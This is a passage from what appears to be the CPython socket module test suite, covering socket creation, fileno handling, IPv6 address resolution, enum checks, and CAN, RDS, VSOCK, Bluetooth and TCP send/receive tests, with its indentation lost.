def test_sendall_interrupted(self):
self.check_sendall_interrupted(False)
@unittest.skipIf(sys.platform == 'OpenVMS', 'OpenVMS has no correct signal handling')
def test_sendall_interrupted_with_timeout(self):
self.check_sendall_interrupted(True)
def test_dealloc_warn(self):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
r = repr(sock)
with self.assertWarns(ResourceWarning) as cm:
sock = None
support.gc_collect()
self.assertIn(r, str(cm.warning.args[0]))
# An open socket file object gets dereferenced after the socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
f = sock.makefile('rb')
r = repr(sock)
sock = None
support.gc_collect()
with self.assertWarns(ResourceWarning):
f = None
support.gc_collect()
def test_name_closed_socketio(self):
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
fp = sock.makefile("rb")
fp.close()
self.assertEqual(repr(fp), "<_io.BufferedReader name=-1>")
def test_unusable_closed_socketio(self):
with socket.socket() as sock:
fp = sock.makefile("rb", buffering=0)
self.assertTrue(fp.readable())
self.assertFalse(fp.writable())
self.assertFalse(fp.seekable())
fp.close()
self.assertRaises(ValueError, fp.readable)
self.assertRaises(ValueError, fp.writable)
self.assertRaises(ValueError, fp.seekable)
def test_socket_close(self):
sock = socket.socket()
try:
sock.bind((HOST, 0))
socket.close(sock.fileno())
with self.assertRaises(OSError):
sock.listen(1)
finally:
with self.assertRaises(OSError):
# sock.close() fails with EBADF
sock.close()
with self.assertRaises(TypeError):
socket.close(None)
with self.assertRaises(OSError):
socket.close(-1)
def test_makefile_mode(self):
for mode in 'r', 'rb', 'rw', 'w', 'wb':
with self.subTest(mode=mode):
with socket.socket() as sock:
encoding = None if "b" in mode else "utf-8"
with sock.makefile(mode, encoding=encoding) as fp:
self.assertEqual(fp.mode, mode)
def test_makefile_invalid_mode(self):
for mode in 'rt', 'x', '+', 'a':
with self.subTest(mode=mode):
with socket.socket() as sock:
with self.assertRaisesRegex(ValueError, 'invalid mode'):
sock.makefile(mode)
def test_pickle(self):
sock = socket.socket()
with sock:
for protocol in range(pickle.HIGHEST_PROTOCOL + 1):
self.assertRaises(TypeError, pickle.dumps, sock, protocol)
for protocol in range(pickle.HIGHEST_PROTOCOL + 1):
family = pickle.loads(pickle.dumps(socket.AF_INET, protocol))
self.assertEqual(family, socket.AF_INET)
type = pickle.loads(pickle.dumps(socket.SOCK_STREAM, protocol))
self.assertEqual(type, socket.SOCK_STREAM)
def test_listen_backlog(self):
for backlog in 0, -1:
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
srv.bind((HOST, 0))
srv.listen(backlog)
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
srv.bind((HOST, 0))
srv.listen()
@support.cpython_only
def test_listen_backlog_overflow(self):
# Issue 15989
import _testcapi
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
srv.bind((HOST, 0))
self.assertRaises(OverflowError, srv.listen, _testcapi.INT_MAX + 1)
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test.')
def test_flowinfo(self):
self.assertRaises(OverflowError, socket.getnameinfo,
(socket_helper.HOSTv6, 0, 0xffffffff), 0)
with socket.socket(socket.AF_INET6, socket.SOCK_STREAM) as s:
self.assertRaises(OverflowError, s.bind, (socket_helper.HOSTv6, 0, -10))
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test.')
def test_getaddrinfo_ipv6_basic(self):
((*_, sockaddr),) = socket.getaddrinfo(
'ff02::1de:c0:face:8D', # Note capital letter `D`.
1234, socket.AF_INET6,
socket.SOCK_DGRAM,
socket.IPPROTO_UDP
)
self.assertEqual(sockaddr, ('ff02::1de:c0:face:8d', 1234, 0, 0))
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test.')
@unittest.skipIf(sys.platform == 'win32', 'does not work on Windows')
@unittest.skipIf(AIX, 'Symbolic scope id does not work')
@unittest.skipUnless(hasattr(socket, 'if_nameindex'), "test needs socket.if_nameindex()")
def test_getaddrinfo_ipv6_scopeid_symbolic(self):
# Just pick up any network interface (Linux, Mac OS X)
(ifindex, test_interface) = socket.if_nameindex()[0]
((*_, sockaddr),) = socket.getaddrinfo(
'ff02::1de:c0:face:8D%' + test_interface,
1234, socket.AF_INET6,
socket.SOCK_DGRAM,
socket.IPPROTO_UDP
)
# Note missing interface name part in IPv6 address
self.assertEqual(sockaddr, ('ff02::1de:c0:face:8d', 1234, 0, ifindex))
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test.')
@unittest.skipUnless(
sys.platform == 'win32',
'Numeric scope id does not work or undocumented')
def test_getaddrinfo_ipv6_scopeid_numeric(self):
# Also works on Linux and Mac OS X, but is not documented (?)
# Windows, Linux and Mac OS X allow nonexistent interface numbers here.
ifindex = 42
((*_, sockaddr),) = socket.getaddrinfo(
'ff02::1de:c0:face:8D%' + str(ifindex),
1234, socket.AF_INET6,
socket.SOCK_DGRAM,
socket.IPPROTO_UDP
)
# Note missing interface name part in IPv6 address
self.assertEqual(sockaddr, ('ff02::1de:c0:face:8d', 1234, 0, ifindex))
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test.')
@unittest.skipIf(sys.platform == 'win32', 'does not work on Windows')
@unittest.skipIf(AIX, 'Symbolic scope id does not work')
@unittest.skipUnless(hasattr(socket, 'if_nameindex'), "test needs socket.if_nameindex()")
def test_getnameinfo_ipv6_scopeid_symbolic(self):
# Just pick up any network interface.
(ifindex, test_interface) = socket.if_nameindex()[0]
sockaddr = ('ff02::1de:c0:face:8D', 1234, 0, ifindex) # Note capital letter `D`.
nameinfo = socket.getnameinfo(sockaddr, socket.NI_NUMERICHOST | socket.NI_NUMERICSERV)
self.assertEqual(nameinfo, ('ff02::1de:c0:face:8d%' + test_interface, '1234'))
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test.')
@unittest.skipUnless( sys.platform == 'win32',
'Numeric scope id does not work or undocumented')
def test_getnameinfo_ipv6_scopeid_numeric(self):
# Also works on Linux (undocumented), but does not work on Mac OS X
# Windows and Linux allow nonexistent interface numbers here.
ifindex = 42
sockaddr = ('ff02::1de:c0:face:8D', 1234, 0, ifindex) # Note capital letter `D`.
nameinfo = socket.getnameinfo(sockaddr, socket.NI_NUMERICHOST | socket.NI_NUMERICSERV)
self.assertEqual(nameinfo, ('ff02::1de:c0:face:8d%' + str(ifindex), '1234'))
def test_str_for_enums(self):
# Make sure that the AF_* and SOCK_* constants have enum-like string
# reprs.
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
self.assertEqual(str(s.family), 'AF_INET')
self.assertEqual(str(s.type), 'SOCK_STREAM')
def test_socket_consistent_sock_type(self):
SOCK_NONBLOCK = getattr(socket, 'SOCK_NONBLOCK', 0)
SOCK_CLOEXEC = getattr(socket, 'SOCK_CLOEXEC', 0)
sock_type = socket.SOCK_STREAM | SOCK_NONBLOCK | SOCK_CLOEXEC
with socket.socket(socket.AF_INET, sock_type) as s:
self.assertEqual(s.type, socket.SOCK_STREAM)
s.settimeout(1)
self.assertEqual(s.type, socket.SOCK_STREAM)
s.settimeout(0)
self.assertEqual(s.type, socket.SOCK_STREAM)
s.setblocking(True)
self.assertEqual(s.type, socket.SOCK_STREAM)
s.setblocking(False)
self.assertEqual(s.type, socket.SOCK_STREAM)
def test_unknown_socket_family_repr(self):
# Test that when created with a family that's not one of the known
# AF_*/SOCK_* constants, socket.family just returns the number.
#
# To do this we fool socket.socket into believing it already has an
# open fd, because on this path it doesn't actually verify the family
# and type before populating the socket object.
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
fd = sock.detach()
unknown_family = max(socket.AddressFamily.__members__.values()) + 1
unknown_type = max(
kind
for name, kind in socket.SocketKind.__members__.items()
if name not in {'SOCK_NONBLOCK', 'SOCK_CLOEXEC'}
) + 1
with socket.socket(
family=unknown_family, type=unknown_type, proto=23,
fileno=fd) as s:
self.assertEqual(s.family, unknown_family)
self.assertEqual(s.type, unknown_type)
# some OSes, like macOS, ignore proto
self.assertIn(s.proto, {0, 23})
@unittest.skipUnless(hasattr(os, 'sendfile'), 'test needs os.sendfile()')
def test__sendfile_use_sendfile(self):
class File:
def __init__(self, fd):
self.fd = fd
def fileno(self):
return self.fd
with socket.socket() as sock:
fd = os.open(os.curdir, os.O_RDONLY)
os.close(fd)
with self.assertRaises(socket._GiveupOnSendfile):
sock._sendfile_use_sendfile(File(fd))
with self.assertRaises(OverflowError):
sock._sendfile_use_sendfile(File(2**1000))
with self.assertRaises(TypeError):
sock._sendfile_use_sendfile(File(None))
def _test_socket_fileno(self, s, family, stype):
self.assertEqual(s.family, family)
self.assertEqual(s.type, stype)
fd = s.fileno()
s2 = socket.socket(fileno=fd)
self.addCleanup(s2.close)
# detach old fd to avoid double close
s.detach()
self.assertEqual(s2.family, family)
self.assertEqual(s2.type, stype)
self.assertEqual(s2.fileno(), fd)
def test_socket_fileno(self):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(s.close)
s.bind((socket_helper.HOST, 0))
self._test_socket_fileno(s, socket.AF_INET, socket.SOCK_STREAM)
if hasattr(socket, "SOCK_DGRAM"):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.addCleanup(s.close)
s.bind((socket_helper.HOST, 0))
self._test_socket_fileno(s, socket.AF_INET, socket.SOCK_DGRAM)
if socket_helper.IPV6_ENABLED:
s = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
self.addCleanup(s.close)
s.bind((socket_helper.HOSTv6, 0, 0, 0))
self._test_socket_fileno(s, socket.AF_INET6, socket.SOCK_STREAM)
if hasattr(socket, "AF_UNIX") and not (sys.platform == 'OpenVMS'):
tmpdir = tempfile.mkdtemp()
self.addCleanup(shutil.rmtree, tmpdir)
s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
self.addCleanup(s.close)
try:
s.bind(os.path.join(tmpdir, 'socket'))
except PermissionError:
pass
else:
self._test_socket_fileno(s, socket.AF_UNIX,
socket.SOCK_STREAM)
def test_socket_fileno_rejects_float(self):
with self.assertRaises(TypeError):
socket.socket(socket.AF_INET, socket.SOCK_STREAM, fileno=42.5)
def test_socket_fileno_rejects_other_types(self):
with self.assertRaises(TypeError):
socket.socket(socket.AF_INET, socket.SOCK_STREAM, fileno="foo")
def test_socket_fileno_rejects_invalid_socket(self):
with self.assertRaisesRegex(ValueError, "negative file descriptor"):
socket.socket(socket.AF_INET, socket.SOCK_STREAM, fileno=-1)
@unittest.skipIf(os.name == "nt", "Windows disallows -1 only")
def test_socket_fileno_rejects_negative(self):
with self.assertRaisesRegex(ValueError, "negative file descriptor"):
socket.socket(socket.AF_INET, socket.SOCK_STREAM, fileno=-42)
@unittest.skipIf(sys.platform == 'OpenVMS', 'OpenVMS has invalid socket from fileno implementation')
def test_socket_fileno_requires_valid_fd(self):
WSAENOTSOCK = 10038
with self.assertRaises(OSError) as cm:
socket.socket(fileno=support.make_bad_fd())
self.assertIn(cm.exception.errno, (errno.EBADF, WSAENOTSOCK))
with self.assertRaises(OSError) as cm:
socket.socket(
socket.AF_INET,
socket.SOCK_STREAM,
fileno=support.make_bad_fd())
self.assertIn(cm.exception.errno, (errno.EBADF, WSAENOTSOCK))
@unittest.skipIf(sys.platform == 'OpenVMS', 'OpenVMS has invalid socket from fileno implementation')
def test_socket_fileno_requires_socket_fd(self):
with tempfile.NamedTemporaryFile() as afile:
with self.assertRaises(OSError):
socket.socket(fileno=afile.fileno())
with self.assertRaises(OSError) as cm:
socket.socket(
socket.AF_INET,
socket.SOCK_STREAM,
fileno=afile.fileno())
self.assertEqual(cm.exception.errno, errno.ENOTSOCK)
def test_addressfamily_enum(self):
import _socket, enum
CheckedAddressFamily = enum._old_convert_(
enum.IntEnum, 'AddressFamily', 'socket',
lambda C: C.isupper() and C.startswith('AF_'),
source=_socket,
)
enum._test_simple_enum(CheckedAddressFamily, socket.AddressFamily)
def test_socketkind_enum(self):
import _socket, enum
CheckedSocketKind = enum._old_convert_(
enum.IntEnum, 'SocketKind', 'socket',
lambda C: C.isupper() and C.startswith('SOCK_'),
source=_socket,
)
enum._test_simple_enum(CheckedSocketKind, socket.SocketKind)
def test_msgflag_enum(self):
import _socket, enum
CheckedMsgFlag = enum._old_convert_(
enum.IntFlag, 'MsgFlag', 'socket',
lambda C: C.isupper() and C.startswith('MSG_'),
source=_socket,
)
enum._test_simple_enum(CheckedMsgFlag, socket.MsgFlag)
def test_addressinfo_enum(self):
import _socket, enum
CheckedAddressInfo = enum._old_convert_(
enum.IntFlag, 'AddressInfo', 'socket',
lambda C: C.isupper() and C.startswith('AI_'),
source=_socket)
enum._test_simple_enum(CheckedAddressInfo, socket.AddressInfo)
@unittest.skipUnless(HAVE_SOCKET_CAN, 'SocketCan required for this test.')
class BasicCANTest(unittest.TestCase):
def testCrucialConstants(self):
socket.AF_CAN
socket.PF_CAN
socket.CAN_RAW
@unittest.skipUnless(hasattr(socket, "CAN_BCM"),
'socket.CAN_BCM required for this test.')
def testBCMConstants(self):
socket.CAN_BCM
# opcodes
socket.CAN_BCM_TX_SETUP # create (cyclic) transmission task
socket.CAN_BCM_TX_DELETE # remove (cyclic) transmission task
socket.CAN_BCM_TX_READ # read properties of (cyclic) transmission task
socket.CAN_BCM_TX_SEND # send one CAN frame
socket.CAN_BCM_RX_SETUP # create RX content filter subscription
socket.CAN_BCM_RX_DELETE # remove RX content filter subscription
socket.CAN_BCM_RX_READ # read properties of RX content filter subscription
socket.CAN_BCM_TX_STATUS # reply to TX_READ request
socket.CAN_BCM_TX_EXPIRED # notification on performed transmissions (count=0)
socket.CAN_BCM_RX_STATUS # reply to RX_READ request
socket.CAN_BCM_RX_TIMEOUT # cyclic message is absent
socket.CAN_BCM_RX_CHANGED # updated CAN frame (detected content change)
# flags
socket.CAN_BCM_SETTIMER
socket.CAN_BCM_STARTTIMER
socket.CAN_BCM_TX_COUNTEVT
socket.CAN_BCM_TX_ANNOUNCE
socket.CAN_BCM_TX_CP_CAN_ID
socket.CAN_BCM_RX_FILTER_ID
socket.CAN_BCM_RX_CHECK_DLC
socket.CAN_BCM_RX_NO_AUTOTIMER
socket.CAN_BCM_RX_ANNOUNCE_RESUME
socket.CAN_BCM_TX_RESET_MULTI_IDX
socket.CAN_BCM_RX_RTR_FRAME
def testCreateSocket(self):
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
pass
@unittest.skipUnless(hasattr(socket, "CAN_BCM"),
'socket.CAN_BCM required for this test.')
def testCreateBCMSocket(self):
with socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_BCM) as s:
pass
def testBindAny(self):
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
address = ('', )
s.bind(address)
self.assertEqual(s.getsockname(), address)
def testTooLongInterfaceName(self):
# most systems limit IFNAMSIZ to 16, take 1024 to be sure
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
self.assertRaisesRegex(OSError, 'interface name too long',
s.bind, ('x' * 1024,))
@unittest.skipUnless(hasattr(socket, "CAN_RAW_LOOPBACK"),
'socket.CAN_RAW_LOOPBACK required for this test.')
def testLoopback(self):
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
for loopback in (0, 1):
s.setsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_LOOPBACK,
loopback)
self.assertEqual(loopback,
s.getsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_LOOPBACK))
@unittest.skipUnless(hasattr(socket, "CAN_RAW_FILTER"),
'socket.CAN_RAW_FILTER required for this test.')
def testFilter(self):
can_id, can_mask = 0x200, 0x700
can_filter = struct.pack("=II", can_id, can_mask)
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
s.setsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_FILTER, can_filter)
self.assertEqual(can_filter,
s.getsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_FILTER, 8))
s.setsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_FILTER, bytearray(can_filter))
@unittest.skipUnless(HAVE_SOCKET_CAN, 'SocketCan required for this test.')
class CANTest(ThreadedCANSocketTest):
def __init__(self, methodName='runTest'):
ThreadedCANSocketTest.__init__(self, methodName=methodName)
@classmethod
def build_can_frame(cls, can_id, data):
"""Build a CAN frame."""
can_dlc = len(data)
data = data.ljust(8, b'\x00')
return struct.pack(cls.can_frame_fmt, can_id, can_dlc, data)
@classmethod
def dissect_can_frame(cls, frame):
"""Dissect a CAN frame."""
can_id, can_dlc, data = struct.unpack(cls.can_frame_fmt, frame)
return (can_id, can_dlc, data[:can_dlc])
def testSendFrame(self):
cf, addr = self.s.recvfrom(self.bufsize)
self.assertEqual(self.cf, cf)
self.assertEqual(addr[0], self.interface)
def _testSendFrame(self):
self.cf = self.build_can_frame(0x00, b'\x01\x02\x03\x04\x05')
self.cli.send(self.cf)
def testSendMaxFrame(self):
cf, addr = self.s.recvfrom(self.bufsize)
self.assertEqual(self.cf, cf)
def _testSendMaxFrame(self):
self.cf = self.build_can_frame(0x00, b'\x07' * 8)
self.cli.send(self.cf)
def testSendMultiFrames(self):
cf, addr = self.s.recvfrom(self.bufsize)
self.assertEqual(self.cf1, cf)
cf, addr = self.s.recvfrom(self.bufsize)
self.assertEqual(self.cf2, cf)
def _testSendMultiFrames(self):
self.cf1 = self.build_can_frame(0x07, b'\x44\x33\x22\x11')
self.cli.send(self.cf1)
self.cf2 = self.build_can_frame(0x12, b'\x99\x22\x33')
self.cli.send(self.cf2)
@unittest.skipUnless(hasattr(socket, "CAN_BCM"),
'socket.CAN_BCM required for this test.')
def _testBCM(self):
cf, addr = self.cli.recvfrom(self.bufsize)
self.assertEqual(self.cf, cf)
can_id, can_dlc, data = self.dissect_can_frame(cf)
self.assertEqual(self.can_id, can_id)
self.assertEqual(self.data, data)
@unittest.skipUnless(hasattr(socket, "CAN_BCM"),
'socket.CAN_BCM required for this test.')
def testBCM(self):
bcm = socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_BCM)
self.addCleanup(bcm.close)
bcm.connect((self.interface,))
self.can_id = 0x123
self.data = bytes([0xc0, 0xff, 0xee])
self.cf = self.build_can_frame(self.can_id, self.data)
opcode = socket.CAN_BCM_TX_SEND
flags = 0
count = 0
ival1_seconds = ival1_usec = ival2_seconds = ival2_usec = 0
bcm_can_id = 0x0222
nframes = 1
assert len(self.cf) == 16
header = struct.pack(self.bcm_cmd_msg_fmt,
opcode,
flags,
count,
ival1_seconds,
ival1_usec,
ival2_seconds,
ival2_usec,
bcm_can_id,
nframes,
)
header_plus_frame = header + self.cf
bytes_sent = bcm.send(header_plus_frame)
self.assertEqual(bytes_sent, len(header_plus_frame))
@unittest.skipUnless(HAVE_SOCKET_CAN_ISOTP, 'CAN ISOTP required for this test.')
class ISOTPTest(unittest.TestCase):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.interface = "vcan0"
def testCrucialConstants(self):
socket.AF_CAN
socket.PF_CAN
socket.CAN_ISOTP
socket.SOCK_DGRAM
def testCreateSocket(self):
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
pass
@unittest.skipUnless(hasattr(socket, "CAN_ISOTP"),
'socket.CAN_ISOTP required for this test.')
def testCreateISOTPSocket(self):
with socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_ISOTP) as s:
pass
def testTooLongInterfaceName(self):
# most systems limit IFNAMSIZ to 16, take 1024 to be sure
with socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_ISOTP) as s:
with self.assertRaisesRegex(OSError, 'interface name too long'):
s.bind(('x' * 1024, 1, 2))
def testBind(self):
try:
with socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_ISOTP) as s:
addr = self.interface, 0x123, 0x456
s.bind(addr)
self.assertEqual(s.getsockname(), addr)
except OSError as e:
if e.errno == errno.ENODEV:
self.skipTest('network interface `%s` does not exist' %
self.interface)
else:
raise
@unittest.skipUnless(HAVE_SOCKET_CAN_J1939, 'CAN J1939 required for this test.')
class J1939Test(unittest.TestCase):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.interface = "vcan0"
@unittest.skipUnless(hasattr(socket, "CAN_J1939"),
'socket.CAN_J1939 required for this test.')
def testJ1939Constants(self):
socket.CAN_J1939
socket.J1939_MAX_UNICAST_ADDR
socket.J1939_IDLE_ADDR
socket.J1939_NO_ADDR
socket.J1939_NO_NAME
socket.J1939_PGN_REQUEST
socket.J1939_PGN_ADDRESS_CLAIMED
socket.J1939_PGN_ADDRESS_COMMANDED
socket.J1939_PGN_PDU1_MAX
socket.J1939_PGN_MAX
socket.J1939_NO_PGN
# J1939 socket options
socket.SO_J1939_FILTER
socket.SO_J1939_PROMISC
socket.SO_J1939_SEND_PRIO
socket.SO_J1939_ERRQUEUE
socket.SCM_J1939_DEST_ADDR
socket.SCM_J1939_DEST_NAME
socket.SCM_J1939_PRIO
socket.SCM_J1939_ERRQUEUE
socket.J1939_NLA_PAD
socket.J1939_NLA_BYTES_ACKED
socket.J1939_EE_INFO_NONE
socket.J1939_EE_INFO_TX_ABORT
socket.J1939_FILTER_MAX
@unittest.skipUnless(hasattr(socket, "CAN_J1939"),
'socket.CAN_J1939 required for this test.')
def testCreateJ1939Socket(self):
with socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_J1939) as s:
pass
def testBind(self):
try:
with socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_J1939) as s:
addr = self.interface, socket.J1939_NO_NAME, socket.J1939_NO_PGN, socket.J1939_NO_ADDR
s.bind(addr)
self.assertEqual(s.getsockname(), addr)
except OSError as e:
if e.errno == errno.ENODEV:
self.skipTest('network interface `%s` does not exist' %
self.interface)
else:
raise
@unittest.skipUnless(HAVE_SOCKET_RDS, 'RDS sockets required for this test.')
class BasicRDSTest(unittest.TestCase):
def testCrucialConstants(self):
socket.AF_RDS
socket.PF_RDS
def testCreateSocket(self):
with socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0) as s:
pass
def testSocketBufferSize(self):
bufsize = 16384
with socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0) as s:
s.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, bufsize)
s.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, bufsize)
@unittest.skipUnless(HAVE_SOCKET_RDS, 'RDS sockets required for this test.')
class RDSTest(ThreadedRDSSocketTest):
def __init__(self, methodName='runTest'):
ThreadedRDSSocketTest.__init__(self, methodName=methodName)
def setUp(self):
super().setUp()
self.evt = threading.Event()
def testSendAndRecv(self):
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data, data)
self.assertEqual(self.cli_addr, addr)
def _testSendAndRecv(self):
self.data = b'spam'
self.cli.sendto(self.data, 0, (HOST, self.port))
def testPeek(self):
data, addr = self.serv.recvfrom(self.bufsize, socket.MSG_PEEK)
self.assertEqual(self.data, data)
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data, data)
def _testPeek(self):
self.data = b'spam'
self.cli.sendto(self.data, 0, (HOST, self.port))
@requireAttrs(socket.socket, 'recvmsg')
def testSendAndRecvMsg(self):
data, ancdata, msg_flags, addr = self.serv.recvmsg(self.bufsize)
self.assertEqual(self.data, data)
@requireAttrs(socket.socket, 'sendmsg')
def _testSendAndRecvMsg(self):
self.data = b'hello ' * 10
self.cli.sendmsg([self.data], (), 0, (HOST, self.port))
def testSendAndRecvMulti(self):
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data1, data)
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data2, data)
def _testSendAndRecvMulti(self):
self.data1 = b'bacon'
self.cli.sendto(self.data1, 0, (HOST, self.port))
self.data2 = b'egg'
self.cli.sendto(self.data2, 0, (HOST, self.port))
def testSelect(self):
r, w, x = select.select([self.serv], [], [], 3.0)
self.assertIn(self.serv, r)
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data, data)
def _testSelect(self):
self.data = b'select'
self.cli.sendto(self.data, 0, (HOST, self.port))
@unittest.skipUnless(HAVE_SOCKET_QIPCRTR,
'QIPCRTR sockets required for this test.')
class BasicQIPCRTRTest(unittest.TestCase):
def testCrucialConstants(self):
socket.AF_QIPCRTR
def testCreateSocket(self):
with socket.socket(socket.AF_QIPCRTR, socket.SOCK_DGRAM) as s:
pass
def testUnbound(self):
with socket.socket(socket.AF_QIPCRTR, socket.SOCK_DGRAM) as s:
self.assertEqual(s.getsockname()[1], 0)
def testBindSock(self):
with socket.socket(socket.AF_QIPCRTR, socket.SOCK_DGRAM) as s:
socket_helper.bind_port(s, host=s.getsockname()[0])
self.assertNotEqual(s.getsockname()[1], 0)
def testInvalidBindSock(self):
with socket.socket(socket.AF_QIPCRTR, socket.SOCK_DGRAM) as s:
self.assertRaises(OSError, socket_helper.bind_port, s, host=-2)
def testAutoBindSock(self):
with socket.socket(socket.AF_QIPCRTR, socket.SOCK_DGRAM) as s:
s.connect((123, 123))
self.assertNotEqual(s.getsockname()[1], 0)
@unittest.skipIf(fcntl is None, "need fcntl")
@unittest.skipUnless(HAVE_SOCKET_VSOCK,
'VSOCK sockets required for this test.')
class BasicVSOCKTest(unittest.TestCase):
def testCrucialConstants(self):
socket.AF_VSOCK
def testVSOCKConstants(self):
socket.SO_VM_SOCKETS_BUFFER_SIZE
socket.SO_VM_SOCKETS_BUFFER_MIN_SIZE
socket.SO_VM_SOCKETS_BUFFER_MAX_SIZE
socket.VMADDR_CID_ANY
socket.VMADDR_PORT_ANY
socket.VMADDR_CID_HOST
socket.VM_SOCKETS_INVALID_VERSION
socket.IOCTL_VM_SOCKETS_GET_LOCAL_CID
def testCreateSocket(self):
with socket.socket(socket.AF_VSOCK, socket.SOCK_STREAM) as s:
pass
def testSocketBufferSize(self):
with socket.socket(socket.AF_VSOCK, socket.SOCK_STREAM) as s:
orig_max = s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MAX_SIZE)
orig = s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_SIZE)
orig_min = s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MIN_SIZE)
s.setsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MAX_SIZE, orig_max * 2)
s.setsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_SIZE, orig * 2)
s.setsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MIN_SIZE, orig_min * 2)
self.assertEqual(orig_max * 2,
s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MAX_SIZE))
self.assertEqual(orig * 2,
s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_SIZE))
self.assertEqual(orig_min * 2,
s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MIN_SIZE))
@unittest.skipUnless(HAVE_SOCKET_BLUETOOTH,
'Bluetooth sockets required for this test.')
class BasicBluetoothTest(unittest.TestCase):
def testBluetoothConstants(self):
socket.BDADDR_ANY
socket.BDADDR_LOCAL
socket.AF_BLUETOOTH
socket.BTPROTO_RFCOMM
if sys.platform != "win32":
socket.BTPROTO_HCI
socket.SOL_HCI
socket.BTPROTO_L2CAP
if not sys.platform.startswith("freebsd"):
socket.BTPROTO_SCO
def testCreateRfcommSocket(self):
with socket.socket(socket.AF_BLUETOOTH, socket.SOCK_STREAM, socket.BTPROTO_RFCOMM) as s:
pass
@unittest.skipIf(sys.platform == "win32", "windows does not support L2CAP sockets")
def testCreateL2capSocket(self):
with socket.socket(socket.AF_BLUETOOTH, socket.SOCK_SEQPACKET, socket.BTPROTO_L2CAP) as s:
pass
@unittest.skipIf(sys.platform == "win32", "windows does not support HCI sockets")
def testCreateHciSocket(self):
with socket.socket(socket.AF_BLUETOOTH, socket.SOCK_RAW, socket.BTPROTO_HCI) as s:
pass
@unittest.skipIf(sys.platform == "win32" or sys.platform.startswith("freebsd"),
"windows and freebsd do not support SCO sockets")
def testCreateScoSocket(self):
with socket.socket(socket.AF_BLUETOOTH, socket.SOCK_SEQPACKET, socket.BTPROTO_SCO) as s:
pass
class BasicTCPTest(SocketConnectedTest):
def __init__(self, methodName='runTest'):
SocketConnectedTest.__init__(self, methodName=methodName)
def testRecv(self):
# Testing large receive over TCP
msg = self.cli_conn.recv(1024)
self.assertEqual(msg, MSG)
def _testRecv(self):
self.serv_conn.send(MSG)
def testOverFlowRecv(self):
# Testing receive in chunks over TCP
seg1 = self.cli_conn.recv(len(MSG) - 3)
seg2 = self.cli_conn.recv(1024)
msg = seg1 + seg2
self.assertEqual(msg, MSG)
def _testOverFlowRecv(self):
self.serv_conn.send(MSG)
def testRecvFrom(self):
# Testing large recvfrom() over TCP
msg, addr = self.cli_conn.recvfrom(1024)
self.assertEqual(msg, MSG)
def _testRecvFrom(self):
self.serv_conn.send(MSG)
def testOverFlowRecvFrom(self):
# Testing recvfrom() in chunks over TCP
seg1, addr = self.cli_conn.recvfrom(len(MSG)-3)
seg2, addr = self.cli_conn.recvfrom(1024)
msg = seg1 + seg2
self.assertEqual(msg, MSG)
def _testOverFlowRecvFrom(self):
self.serv_conn.send(MSG)
def testSendAll(self):
# Testing sendall() with a 2048 byte string over TCP
msg = b''
while 1:
